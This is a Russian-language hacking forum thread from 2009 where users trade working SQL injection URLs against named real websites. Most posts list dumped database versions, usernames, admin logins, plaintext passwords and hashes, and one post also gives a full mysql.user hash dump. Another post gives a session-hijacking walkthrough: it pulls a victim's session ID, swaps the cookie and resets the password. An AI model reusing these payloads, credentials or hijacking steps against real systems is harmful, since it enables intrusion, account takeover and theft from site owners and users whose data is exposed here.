<<Администрация города Орла>>
http://www.orel-adm.ru/index.php?id=-4-3'+union+select+1,unhex(hex(version())),3/*
db: 4.1.10a-log
name_db: tbase
user: utw@localhost
http://www.physikinstrumente.com/en/news/fullnews.php?newsid=-148+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),5,6,7
Version : 4.1.15-Debian_1ubuntu5-log
Database : pi_temp
User : pi_temp_admin@localhost
Cennarios
04.04.2009, 17:57
http://www.agencyscams.info/scammer_profile.php?id=-1+union+select+concat_ws(0x3a3a,login,password)+fr om+users+limit+0,1/*
Брачное агенцтво =)))
<<Электронная библиотека "Custos">>
http://custos.ru/view_all.php?id=-66'+union+select+1,2,concat_ws(0x3a,table_schema,c olumn_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+from+information_schema.columns+where+table _name='userlist'+limit+1,1--+
db: 5.0.67 percona-b5-log
name_db: custos
user: custos@localhost
OS: redhat-linux-gnu
-=admin=-
table:wp_user
db:custos_aliber
log: admin
pass: $P$Bk/TSk3K10o50RA8rYCm64aCQouR/ мда :( :( :(
mail: aliber12@yandex.ru
-=users=-
table_name: user_list
db: custos
log: custos
pass: pass!23wo2345$%rd
Юзвер оказался один... Онже по видемому и админ...
---------------------------------------------------
---------------------------------------------------
<<Школа эротического танца"APsara">> :)
http://www.stripdance.com.ua/index.php?id=999+union+select+1,2,3,concat_ws(0x3a ,version(),database(),user())--
db: 5.1.30
name_db: stripdan_db
user: stripdan_admin@localhost
читаем robots.txt
User-agent:
Disallow:/administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
-------------
http://www.wdance.com.ua/administrator/
Вас встречает надпись "Добро пожаловать в Joomla!" :)
-------------
-=admins=-
table:user_tab
type: admin
log: admin
pass: 777 :p
type: admin
log: jony
pas: f56d08c116d513a223508f31b53d8186 :(
-=users=-
+limit+x,x--+
:D :D :D
mailbrush
04.04.2009, 21:16
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version())soznanie_jest@localhost:soznanie_web14 db1:5.0.67-community-log
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users+limit+1,1
admin:$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21
http://so-znanie.com/forum/index.php
.:[melkiy]:.
04.04.2009, 21:58
http://www.adventureonline.co.za/read_more.php?id=-1874+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16--
Database Version: 5.0.67-community
Database name: adventur_adventure
User name: adventur_adventu@localhost
Вытаскивать из users
http://www.panda.org.za/article.php?id=-498+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Database Version: 4.1.22
Database name: panda
User name: panda@localhost
:D
_http://local.abonent.m-10.ru/forgot.html?txtLogin=asd&email=-1'+OR+substring(@@version,1,1)=4+--+
version():4
http://www.cy-pr.com/img_m-10.ru_6.gif
_http://billur.net/useradmin/pass.php
version():4
http://www.cy-pr.com/img_billur.net_6.gif
post методом
оба поля уязвимы
_http://xfes.ru/p/hosting/-1'+union+select+version()+--+
version():5.1.32-log
http://www.cy-pr.com/img_xfes.ru_6.gif
авторизация также уязвима))
DrAssault
05.04.2009, 12:59
http://www.jaffnaroyalfamily.org/news.php?id=-41+union+select+1,2,date,version(),5,6,7,8+from+ne ws/*
mailbrush
05.04.2009, 13:36
http://www.tagderkueche.de/presse/adetails.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6
Job
Все сайты на серваке Jobовые,версия пятая, доступ ко всем базам =)
http://www.fairylakejobs.net/php/job.php?id=-343989/**/union/**/select/**/1,concat_ws(0x3A3a,user(),version(),database()),3/*
fljobssi@localhost
5.0.45
sql57865_1
.:[melkiy]:.
05.04.2009, 15:34
http://archives.stael.org/2/sections.php3?op=viewarticle&artid=9999+union+select+1,2,3,4,5--
Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: staelorg
User name: staelorg@88.191.253.130
http://agria.hu/sections.php3?op=viewarticle&artid=9999+union+select+1,2,3,4,5--
Database Version: 4.1.11-Debian_4sarge8-log
Database name: nuke
User name: portal@localhost
http://www.atlantyd.com/sections.php3?op=viewarticle&artid=9999+union+select+1,2,3,4,5--
Database Version: 4.0.21-log
Database name: atlantyd_com
User name: atlantyd_com@localhost
http://www.povituha.ru/news.php?id=9999+union+select+1,2,concat_ws(0x3a,v ersion(),database(),user()),4,5,6--+
db: 5.0.32-Debian_7etch3-log
name_db: povituha
user: povit_gst@localhost
-----------------------------
-----------------------------
http://oculus.ru/blog.php?id=106&a=-9+union+select+unhex(hex(concat_ws(0x3a,version(), database(),user()))),2,3,4,5,6,7--+
db: 4.1.14-log
name_db: oculus
user: oculus@localhost
M.W.N.N.
05.04.2009, 19:13
http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(version( ),0x3a,database(),0x3a,user()))),4,5,6,7,8/*
version():4.1.11-Debian_4sarge7-log
database():hcch
user():hcch@localhost
http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(user,0x3 a,password))),4,5,6,7,8+from+mysql.user/*
root:066bc62049564980
debian-sys-maint:29fd31b70de75eef
loonsom:30acaa6013620a70
hcch:49486a7f003c5faa
mp3act:00e4b206540aea24
rwv:7afa5b201c1b6669
vtiger:7888cda30bcc3c16
vtiger_sport:2db1898a5bbad4ca
newwavei:5f5a29b54316b43f
stayokay:5a0f66d4277d854b
kees:6e15cff222b5b0dc
incadat:177de41f23fdd5ae
vaneijzeren:11105af933ee8348
.:[melkiy]:.
05.04.2009, 19:27
http://www.virginworlds.com/pg.php?n=470099+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22--
Database Version: 5.0.67-0ubuntu6
Database name: virginworlds
User name: vwuser@localhost
M.W.N.N.
05.04.2009, 19:48
http://scriptorium.serve-it.nl/view.php?sid=54+union+select+1,unhex(hex(concat(ve rsion(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost
pr4
http://imperial.ca.gov/section.php?id=17+and+ascii(substring(y()),1,1))=x
y1=version
y2=user
x1=53,46,48,46,48,55
x2=114,105,98,97,114,100,111,104,100,122,64,108,11 1,99,97,108,104,111,115,116
version() - 5.0.07
user() - ribardohdz@localhost
worldstart.com
pr=5
http://worldstart.com/kb/answers.php?sku=3917+and+1=0+union+select+1,2,3,co ncat_ws(0x20,user(),database(),version(),@@basedir ,@@datadir,@@tmpdir,@@version_compile_os),5+--%20--
tipadmin@207.126.59.171 kb 5.0.45 /usr/ /var/lib/mysql/ /tmp/ redhat-linux-gnu
ILYAtirtir
05.04.2009, 23:45
geometria.ru
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,concat_ws(0x3a,dat abase(),user(),version()),7/*
geometria:geometria@client131-18.cmk.ru:5.0.45-log
Идем в information_schema.
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,table_name,7+from+ information_schema.tables/*
Интересная таблица "user"
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,column_name,7+from +information_schema.columns+where+table_name=0x757 36572/*
Мне понравились колонки:login,password =)
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,concat_ws(0x3a,log in,password),7+from+user+limit+1,500/*
Выводим первые 500 из базы.Всего на данные момент 176055 рабочих аакаунтов.
Пароль захеширован хз чем может md5 с солью,но колонку с ней не нашел,а нам и не нада.))
И так выбираем пользователя,например "Fusion".
http://smr.geometria.ru/index.php?show=user&user=999+union+select+1,2,3,4,5,concat_ws(0x3a,log in,session_id),7+from+user+where+login=0x467573696 F6E/*
Fusion:mfjrhju2pua8lj4ob7k3n20e81
Итакс,хорошо.Дальше если зареганы заходим в редактирование cookies.Меняем PHPSESSID,ок,F5 и вот мы под чужим логином. Жмем на наш логин попадаем на страницу с инфой пользователя,жмем на изменить данные.Фишка в том что при смене пароля не запрашивает старый пароль) поэтому 2 раза вводим новый пароль потом "изменить" и все.=)
http://www.uoit.ca/calendar/0405/info-display.php?ID=-83/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//*
Database Version: 4..20-standard
Database name: uoitcalendar0405
User name: uoitcalendar0405@localhost
http://www.quantumbindery.ca/bindery-equipment/equipment-display.php?id=-10/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//*
Database Version: 4.1.22-standard
Database name: quantum_products
User name: quantum_leap@localhost
http://ladyfitness.ru/php/photo.php3?id=999+union+select+1,concat_ws(0x3a,ve rsion(),database(),user(),@@version_compile_os),3, 4,5,6,7,8--+
db: 5.0.51
name_db: ladyfit
user: db_user@localhost
os: portbld-freebsd6.2
table: users
db: pun_bb
-=admin=-
log: admin
pass: 36058a75bd500c96eeaca789e9f1fe1d758e7f66 :(
-=users=-
+limit+x,x--+
laedafess
06.04.2009, 17:01
греческий шоп (pr = 3)
http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5+--
user() = roses2u_roses@localhost
database() = roses2u_roses
version() = 5.0.67-community
http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,username,pass word),5+from+users+--
username = roses2u
password = rc4#7!
пародия на админку: http://roses2u.gr/console/
<<Информационно-справочная служба>>
http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5--
db: 5.0.51a-community-log
name_db: helpnov_help
user: helpnov_help@localhost
os: redhat-linux-gnu
table: pmd_admin
-=admin=-
log: admin
pass: savva
table: pmd_users
http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,login,pass), 5+from+pmd_users--+
и все юзверы....
--------------------------------------
<<HeppyWoman>>
http://happywoman.com.ua/article&pid=571&parent=999'+union+select+concat_ws(0x3a,table_name ,table_schema)+from+information_schema.columns+whe re+column_name+like+0x70617373776f7264--+
db: 5.0.75
name_db: happywoman
user: dbhappywoman@localhost
os: portbld-freebsd7.0
-------------------------------
http://happywoman.com.ua/admin/ :(
-------------------------------
table: cns_users
db: cnstats
-=admins=-
log: admin
pass: 2E6975A9DE99EA679B328195AB5B3AB5BA22FD8C :(
-=users=-
log: fortest
pass: fortest
+limit+x,x--+
http://www.beattyhigh.net/scrapbook/photo.php?id=11/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/**/LIMIT/**/1,1/*
Database Version: 4.1.25-Debian_mt1
Database name: brightideasutah_com_-_bhsgen
User name: brightideasuta@64.13.192.13
4 usera в таблице users
id:pass:user
1:starwars:icem
13:friday:admin
24:stinger:webed
25:hotdog:richicem
.:[melkiy]:.
06.04.2009, 21:58
http://www.rode.co.za/news/article.php?ID=-2239+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.32-Debian_7etch8
Database name: engine
User name: rode_root@dedi6.cpt2.host-h.net
Login: admin
Pass: fightingf1sh
Pagerank: 6
http://www.asia-anf.org/NewsDetails.php?NewsId=-166+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6--
Database Version: 4.1.22-standard
Database name: asinanoo_anf
User name: asinanoo_admin@localhost
PR - 5
http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6--
Database Version : 5.0.32-Debian_7etch6-log
Database name : superligaDB
User name : superliga@www.internal.hockeyboss.ru
admin :
http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,2,concat_ws(0x3a,username,pas swd),4,5,6+from+users+where+username=ch ar(97,100,109,105,110)--
Admin:*10C76DCEABF030E275D0809D5F6C5438CD671BA1 - 957762
.:[melkiy]:.
06.04.2009, 23:45
http://www.jnht.com/heritage_site.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
[B]Database Version: 4.0.27-max-log
Database name: db189841794
User name: dbo189841794@74.208.16.89
http://www.usashooting.org/athlete.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.67-log
Database name: shoot1
User name: usashoot@apache2-twiddle.iris.dreamhost.com
4 админка
competitions:2de809f72949339e849d2b73e39576fa : comps@2468
-
marketing:eb75757f1517f30eaecd258f2d746e02 : ???
-
claire:67d0f2f380bf297e35c354191caec8bd : ???
-
innovative:4a58d6a4040d95671dfcb74f1fbaf592 : ???
http://www.tennoil.com/newsletter.php?id=-252+union+select+1
Database Version: 4.1.12
Database name: tennoil
User name: tennoil@localhost
http://www.israelunitycoalition.org/news/newsletter.php?id=-121633+union+select+1,2,3,concat(user(),0x3a,versi on()),5,6,7,8,9,0,1/*
Израиль :mad:
pr5
ucing@localhost:5.0.45
http://anthenv.web.arizona.edu/Newsletter.php?Id=53333+union+select+1,concat(User name,0x3a,Password),3,UserId,5,6+from+Users
EDU
Database Version: 5.0.22
Database name: anthenv
User name: anthenv@localhost
-
username:sdowney
pass:chaos95
http://anthenv.web.arizona.edu/login.php
не подходит чо то
http://www.neuroscience-tuebingen.de/research-groups/display.php?type=Department&id=-37/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
User name: neuroscience@localhost
Database Version: 5.0.18
Database name: dbneuroscience
attajdid.info
PageRank 7
http://www.attajdid.info/def.asp?codelangue=6&infoun=48015+UNION+SELECT+'0','1',concat_ws(0x3a,v ersion(),user()),'3','4','5','6','7','8','9','10', '11'%20,'12','13','14','15','16','17','18','19','2 0','21','22','23','24','25','26','27','28','29','3 0','31','32','33','34','35','36'--
5.0.67-community-nt:zaherland@localhost
Pagerank: 5
http://www.billybishop.org/newsfull.php?NewsID=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),database(),user(),@@version_comp ile_os),14,15,16,17,18,19
Database Version: 4.1.20
Database name: osmuseums
User name: mrailbishop@localhost
Os : redhat-linux-gnu
<<Бизнес организация стратегии системы "Босс" >>
http://www.bossmag.ru/view.php?id=-3343'+union+select+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os),8,9, 10,11,12,13--+
db: 5.0.32-Debian_7etch4-log
name_db: z90196_bossmag
user: z90196_bossmag@77.221.130.20
os: pc-linux-gnu
Сервак медленный, нет не какого желания на нем докручивать.....
http://harttweb.hartford.edu/mediapage-events.php?mediaID=47+union+select+1,user(),3,4,5, 6+limit+1,1/*
User: root@localhost
Version: 5.0.27-community-nt
Db: hartt
http://www.yourhometeamatremax.ca/listing_profile.php?PropertyID=-306+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29--
Database Version: 4.1.20
Database name: yhtatremax
User name: remax06@localhost
Os : redhat-linux-gnu
http://www.on-the-right-track.com/newsletter.php?id=16933+UNION+SELECT+1,2,3,4,5
Database Version: 4.1.22-standard-log
Database name: admin_main
User name: admin@localhost
<<Data Robotics >>
http://www.drobo.com/droboapps/downloads/index.php?id=-16+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+
db: 5.0.67-community
name_db: droboco_datarobotics1
user: droboco_dradmin@localhost
os: redhat-linux-gnu
---------------------------
http://www.drobo.com/admin/login.php
---------------------------
tables:
accounts
members
http://www.fairtourismsa.org.za/fttsa/display.php?id=50/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30/**/LIMIT/**/1,1/*
Database Version: 5.0.37-community-nt
Database name: fttsa
User name: fttsa_user@41.204.198.52
есть smf_members
Fields member_name:passwd:password_salt
admin:3e86317ab708619c0fd544f555c1e4bcc7d7af3a:f09 b
<<Институт русского языка >>
http://www.ruslang.ru/agens.php?id=div&sp=-84+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15,16,17,18,19--+
db: 4.1.25-log:
name_db: db10011926
user: 10011926@localhost
os: unknown-freebsd4.10
Анимационная студия мультфильмов TOONDRA
http://www.toondra.ru/news.php?newsID=-115+union+selecT+1,2,3,4,5--
ph1l1ster
07.04.2009, 19:28
В честь беспорядков в Кишинёве (https://forum.antichat.ru/threadnav114861-1-10.html) :D
http://www.kishinev.ru/php-bin/gorod_res.php?object_=0+union+Select+1,2,3,concat( user(),0x3a,version(),0x3a,database()),5,6,7,8,9,0 ,11--
Database Version: 5.0.67-community-nt
Database name: ghincul
User name: ghincul@65.182.101.165
http://www.kishinev.ru/php-bin/gorod_res.php?object_=0+union+Select+1,2,3,concat( user_name,0x3a,user_password),5,6,7,8,9,0,11+from+ cpg_users--
http://www.kishinev.ru/gallery/
astanc_:1915
<<Управления в ЖКХ >>
http://www.g-k-h.ru/articles.php?id=-928'+union+select+concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),2,3,4,5,6,7,8/*
db: 4.1.21-log
name_db: lex_pravo
user: rshm_minimba@localhost
os: portbld-freebsd6.1
---------------------------------------------------------
<<Международная выстовка продуктов питания >>
http://www.peterfood.imperiaforum.ru/page.php?id=999'+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62,63,64,65,66,67,version(),69,70--+
db: 5.0.24a
name_db: imperia2
user: imperia2@localhost
os: unknown-freebsd6.1
information_schema :( :( :( - locked.....
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot